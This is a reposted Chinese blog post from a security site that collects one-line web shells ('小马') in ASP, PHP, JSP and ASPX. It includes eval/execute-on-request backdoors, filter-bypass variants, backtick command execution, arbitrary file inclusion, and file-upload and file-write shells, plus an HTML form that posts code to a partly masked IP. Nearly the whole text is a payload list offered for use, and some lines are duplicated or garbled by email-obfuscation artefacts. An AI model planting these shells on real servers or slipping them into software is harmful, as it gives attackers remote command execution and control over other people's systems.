【转载】各种小马小结

admin 2022年12月3日16:20:42评论23 views字数 3029阅读10分5秒阅读模式

[huayang]

原文地址:https://blog.csdn.net/qq_35078631/article/details/77743794

最近总是碰到小马的题目,心想还是小小收集一下各种的小马,碰到新的再更新
ASP <%eval request(“sb”)%> <%execute request(“sb”)%> <%execute(request(“sb”))%> <%execute request(“sb”)%><%'<% loop <%:%> <%'<% loop <%:%><%execute request(“sb”)%> <%execute request(“sb”)'<% loop <%:%>[code] [code] <%execute request(“sb”)'<% loop <%:%> %><%Eval(Request(chr(35)))%><% <%eval request(“sb”)%> <%ExecuteGlobal request(“sb”)%>

if Request(“sb”)<>”” then ExecuteGlobal request(“sb”) end if

<%eval request("sb")%>

<%execute request("sb")%>

<%execute(request("sb"))%>

<%execute request("sb")%><%'<% loop <%:%>

<%'<% loop <%:%><%execute request("sb")%>

<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

%><%Eval(Request(chr(35)))%><%

<%eval request("sb")%>

<%ExecuteGlobal request("sb")%>

if Request("sb")<>"" then ExecuteGlobal request("sb") end if

PHP //容错代码 //使用lanker一句话客户端的专家模式执行相关的php语句

//使用这个后,使用菜刀一句话客户端在配置连接的时候在”配置”一栏输入

[email protected]($_POST[c]);

//绕过<?限制的一句话

<[email protected]($_POST[‘cmd’]);
//这个也是吊炸天…

*; //吊炸天!大致上等价于 //bash bash2 index.html p.php ?>
//访问p.php的时候,bash就会执行bash2这个文件里的命令,后面的文件无视掉
//通过修改bash2这个文件的内容就可以构造命令执行。

$filename=$_GET[‘xbid’];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行

$reg=”c”.”o”.”p”.”y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件

<?php eval($_POST[sb])?>



<?php @eval($_POST[sb])?> //容错代码



<?php assert($_POST[sb]);?> //使用lanker一句话客户端的专家模式执行相关的php语句



<?$_POST['sa']($_POST['sb']);?>



<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>



<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>

//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入



<O>[email protected]($_POST[c]);</O>



<script language="php">@eval($_POST[sb])</script>

//绕过<?限制的一句话

<[email protected]($_POST['cmd']);
//这个也是吊炸天...

<?=`*`;
//吊炸天!大致上等价于
//<?php echo `bash bash2 index.html p.php` ?>
//访问p.php的时候,bash就会执行bash2这个文件里的命令,后面的文件无视掉
//通过修改bash2这个文件的内容就可以构造命令执行。


$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行

$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件

JSP <% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes()); %> your code

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
<input type=submit value="提交">
</form>

ASPX <%@ Page Language=”Jscript”%><%eval(Request.Item[“pass”],”unsafe”);%>

<%@ Page Language=”Jscript” validateRequest=”false” %><%Response.Write(eval(Request.Item[“w”],”unsafe”));%>
//Jscript的asp.net一句话

<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request[“f”]) ); }%>
//C#的asp.net一句话

<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request(“f”)) ) %>
//VB的asp.net一句话

[/huayang]

FROM:浅浅淡淡[hellohy]

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月3日16:20:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【转载】各种小马小结 https://cn-sec.com/archives/1442816.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: